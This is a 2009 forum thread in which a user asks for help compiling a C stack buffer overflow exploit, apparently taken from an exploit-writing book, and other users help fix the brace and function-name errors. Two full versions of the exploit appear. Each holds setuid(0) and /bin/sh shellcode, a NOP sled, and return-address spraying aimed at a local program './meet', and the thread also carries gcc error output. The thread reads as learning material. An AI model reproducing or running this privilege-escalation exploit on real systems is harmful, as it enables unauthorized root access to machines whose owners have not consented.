C Exploit Errors

C Exploit Errors

Post by Israel on Thu Jun 11, 2009 5:50 am
([msg=25242]see C Exploit Errors[/msg])

Been reading a good book on writing exploits. Maybe I've been up too long, but I can't seem to find the last errors in this code. Here's what I got:
Code: Select all
// exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[] = //setuid(0) & Aleph1's shellcode
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // setuid(0) first
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
//Small function to retrieve the esp value (only works locally)
unsigned long get_sp(void) {
   __asm__(".intel_syntax noprefix\n mov eax, esp");
}

int main(int argc, char *argv[1]) { //main function
int i, offset = 0;          //used to count/subtract later   
long esp, ret, *addr_ptr;          //used to save addresses
char *buffer, *ptr;          //two strings: buffer, ptr
int size = 500;             //default buffer size

esp = get_sp();             //get local esp value
if(argc > 1) size = atoi(argv[1]);  //if 1 argument, store to size
if(argc > 2) offset = atoi(argv[2]);//if 2 argument, store offset
if(argc > 3) esp = strou1(argv[3],NULL,0); //used for remote exploits
ret = esp - offset;          //calc default value of return
// print directions for use
fprintf(stderr,"Useage: %s<buff_size> <offset> <esp:0xfff...>\n", argv[0]);
//print feedback of operation
fprintf(stderr, "ESP:0x%x  Offset:0x%x  Return:0x%x\n",esp,offset,ret);

buffer = (char *)malloc(size);      //allocate buffer on heap
ptr = buffer;                       //temp pointer,set to location of buffer
addr_ptr = (long *) ptr;       //temp addr_ptr, set to location of ptr
//Fill entire buffer with return addresses, ensures proper alignment
for(i=0; i < size; i+=4){            //increment of 4 bytes for addr
    *(addr_ptr++) = ret;       //use addr_ptr to write into buffer
}
//Fill 1st half of exploit buffer with NOPs
for(i=0; i < size/2; i++){       //notice we only write up to half the size
   buffer[i] = '\x90';       //place NOPs in the first half of buffer
}

// Now place shellcode
ptr = buffer + size/2;
for(i=0; i < strlen(shellcode); i++)//write half the buffer til the end of sc   
   *(ptr++) = shellcode[i];    //now write the shellcode
}
//Terminate the string
buffer[size-1]=0;          //this is so the buffer ends with x\0
//Now, call the vulerable program with buffer as second arguement.
exec1("./meet", "meet", "Mr.",buffer,0); //the list of args is ended w/0
printf("%s\n",buffer);          //used for remote exploits
//free up the heap
free(buffer);             //play nicely
return   0;                  //exit gracefully
}


Here's the errors from gcc:
Code: Select all
# gcc ./exploit.c -o exploit
./exploit.c:50: error: 'size' undeclared here (not in a function)
./exploit.c:50: warning: data definition has no type or storage class
./exploit.c:52: error: expected declaration specifiers or '...' before string constant
./exploit.c:52: error: expected declaration specifiers or '...' before string constant
./exploit.c:52: error: expected declaration specifiers or '...' before string constant
./exploit.c:52: error: expected declaration specifiers or '...' before 'buffer'
./exploit.c:52: error: expected declaration specifiers or '...' before numeric constant
./exploit.c:52: warning: data definition has no type or storage class
./exploit.c:53: error: expected declaration specifiers or '...' before string constant
./exploit.c:53: error: expected declaration specifiers or '...' before 'buffer'
./exploit.c:53: warning: data definition has no type or storage class
./exploit.c:53: error: conflicting types for 'printf'
./exploit.c:53: note: a parameter list with an ellipsis can't match an empty parameter name list declaration
./exploit.c:55: warning: data definition has no type or storage class
./exploit.c:55: warning: parameter names (without types) in function declaration
./exploit.c:55: error: conflicting types for 'free'
./exploit.c:56: error: expected identifier or '(' before 'return'
./exploit.c:57: error: expected identifier or '(' before '}' token
User avatar
Israel
Experienced User
Experienced User
 
Posts: 74
Joined: Thu Sep 18, 2008 9:53 pm
Blog: View Blog (0)


Re: C Exploit Errors

Post by mischief on Thu Jun 11, 2009 8:13 am
([msg=25244]see Re: C Exploit Errors[/msg])

you use but never define 'size'. the error message is quite clear about that. :\
The whole secret of existence is to have no fear. Never fear what will become of you, depend on no one. Only the moment you reject all help are you freed.
--Buddha
User avatar
mischief
Poster
Poster
 
Posts: 355
Joined: Wed Jan 07, 2009 4:16 pm
Blog: View Blog (0)


Re: C Exploit Errors

Post by Israel on Fri Jun 12, 2009 12:15 am
([msg=25260]see Re: C Exploit Errors[/msg])

Didn't I already do that in the main function?

Line 20:
Code: Select all
int size = 500;             //default buffer size
User avatar
Israel
Experienced User
Experienced User
 
Posts: 74
Joined: Thu Sep 18, 2008 9:53 pm
Blog: View Blog (0)


Re: C Exploit Errors

Post by mischief on Fri Jun 12, 2009 7:30 am
([msg=25271]see Re: C Exploit Errors[/msg])

Code: Select all
for(i=0; i < strlen(shellcode); i++)//write half the buffer til the end of sc   
   *(ptr++) = shellcode[i];    //now write the shellcode
}
//Terminate the string
buffer[size-1]=0;          //this is so the buffer ends with x\0


i think you've added/forgotten braces someplace, possibly after the for statement i quoted. what's happening is you have a problem with scope. you're probably closing main()'s scope with a missing/added brace somewhere.
The whole secret of existence is to have no fear. Never fear what will become of you, depend on no one. Only the moment you reject all help are you freed.
--Buddha
User avatar
mischief
Poster
Poster
 
Posts: 355
Joined: Wed Jan 07, 2009 4:16 pm
Blog: View Blog (0)


Re: C Exploit Errors

Post by xcurious on Fri Jun 12, 2009 8:06 am
([msg=25273]see Re: C Exploit Errors[/msg])

You are missing a opening brace after your for statement and also it seems you need to define strou1 and exec1 before you can use them as a function.
- Apologies to all who I have flamed in the past. Thanks mods for unbanning me.


ckw100 wrote:so i have been pacticeing my batch file hacking for networks
xcurious
Experienced User
Experienced User
 
Posts: 79
Joined: Sun Sep 21, 2008 3:49 pm
Blog: View Blog (0)


Re: C Exploit Errors

Post by Israel on Fri Jun 12, 2009 9:29 am
([msg=25277]see Re: C Exploit Errors[/msg])

Ok, first I found that bracket I was missing. Then for some reason got all these assembly errors even though the same exact code ran perfect in another program. Changed the assembly from nasm to at&t syntax and that was fixed. Then after some googling I discovered the strou1 and exec1 should have been stroul and execl. I had mistaken the L's in my text for ones. I found adding "#include <unistd.h>" to the code would take care of the errors with execl. Now all I have is this:

Code: Select all
# gcc exploit.c -o exploit
/tmp/ccjxgLfn.o: In function `main':
exploit.c:(.text+0x98): undefined reference to `stroul'
collect2: ld returned 1 exit status


Here's the new code:
Code: Select all
// exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[] = //setuid(0) & Aleph1's shellcode
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" // setuid(0) first
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
//Small function to retrieve the esp value (only works locally)
unsigned long get_sp(void) {
//   __asm__(".intel_syntax noprefix\n mov eax, esp");
   __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[1]) { //main function
int i, offset = 0;          //used to count/subtract later   
long esp, ret, *addr_ptr;          //used to save addresses
char *buffer, *ptr;          //two strings: buffer, ptr
int size = 500;             //default buffer size

esp = get_sp();             //get local esp value
if(argc > 1) size = atoi(argv[1]);  //if 1 argument, store to size
if(argc > 2) offset = atoi(argv[2]);//if 2 argument, store offset
if(argc > 3) esp = stroul(argv[3],NULL,0); //used for remote exploits
ret = esp - offset;          //calc default value of return
// print directions for use
fprintf(stderr,"Useage: %s<buff_size> <offset> <esp:0xfff...>\n", argv[0]);
//print feedback of operation
fprintf(stderr, "ESP:0x%x  Offset:0x%x  Return:0x%x\n",esp,offset,ret);

buffer = (char *)malloc(size);      //allocate buffer on heap
ptr = buffer;                       //temp pointer,set to location of buffer
addr_ptr = (long *) ptr;       //temp addr_ptr, set to location of ptr
//Fill entire buffer with return addresses, ensures proper alignment
for(i=0; i < size; i+=4){            //increment of 4 bytes for addr
    *(addr_ptr++) = ret;       //use addr_ptr to write into buffer
}
//Fill 1st half of exploit buffer with NOPs
for(i=0; i < size/2; i++){       //notice we only write up to half the size
   buffer[i] = '\x90';       //place NOPs in the first half of buffer
}

// Now place shellcode
ptr = buffer + size/2;
for(i=0; i < strlen(shellcode); i++){//write half the buffer til the end of sc   
   *(ptr++) = shellcode[i];    //now write the shellcode
}
//Terminate the string
buffer[size-1]=0;          //this is so the buffer ends with x\0
//Now, call the vulerable program with buffer as second arguement.
execl("./meet", "meet", "Mr.",buffer,0); //the list of args is ended w/0
printf("%s\n",buffer);          //used for remote exploits
//free up the heap
free(buffer);             //play nicely
return   0;                  //exit gracefully
}
User avatar
Israel
Experienced User
Experienced User
 
Posts: 74
Joined: Thu Sep 18, 2008 9:53 pm
Blog: View Blog (0)


Re: C Exploit Errors

Post by mischief on Fri Jun 12, 2009 10:35 am
([msg=25278]see Re: C Exploit Errors[/msg])

there is no such function as stroul :p try 'strtoul'
The whole secret of existence is to have no fear. Never fear what will become of you, depend on no one. Only the moment you reject all help are you freed.
--Buddha
User avatar
mischief
Poster
Poster
 
Posts: 355
Joined: Wed Jan 07, 2009 4:16 pm
Blog: View Blog (0)


Re: C Exploit Errors

Post by Israel on Fri Jun 12, 2009 12:04 pm
([msg=25281]see Re: C Exploit Errors[/msg])

You're right. I checked the book, must have made a late night typo. Still, my opinion of the writing has changed now. They didn't include any of these:

Code: Select all
#include <stdlib.h> // gave warnings without
#include <string.h> // gave warnings without
#include <unistd.h> // would not compile without


Thanks for the help! :)
User avatar
Israel
Experienced User
Experienced User
 
Posts: 74
Joined: Thu Sep 18, 2008 9:53 pm
Blog: View Blog (0)


Re: C Exploit Errors

Post by mischief on Fri Jun 12, 2009 1:50 pm
([msg=25284]see Re: C Exploit Errors[/msg])

they were probably using a different compiler, or possibly different compilation flags, or headers that included each other later on. a hole host of differences could occur :p
The whole secret of existence is to have no fear. Never fear what will become of you, depend on no one. Only the moment you reject all help are you freed.
--Buddha
User avatar
mischief
Poster
Poster
 
Posts: 355
Joined: Wed Jan 07, 2009 4:16 pm
Blog: View Blog (0)


Re: C Exploit Errors

Post by Israel on Sat Jun 13, 2009 12:52 am
([msg=25299]see Re: C Exploit Errors[/msg])

Used the same flags and same compiler (maybe a newer version though...) Oh well, it made me think :)
Last edited by Israel on Sun Jun 14, 2009 7:56 am, edited 1 time in total.
User avatar
Israel
Experienced User
Experienced User
 
Posts: 74
Joined: Thu Sep 18, 2008 9:53 pm
Blog: View Blog (0)


Next

Return to C and C++

Who is online

Users browsing this forum: No registered users and 0 guests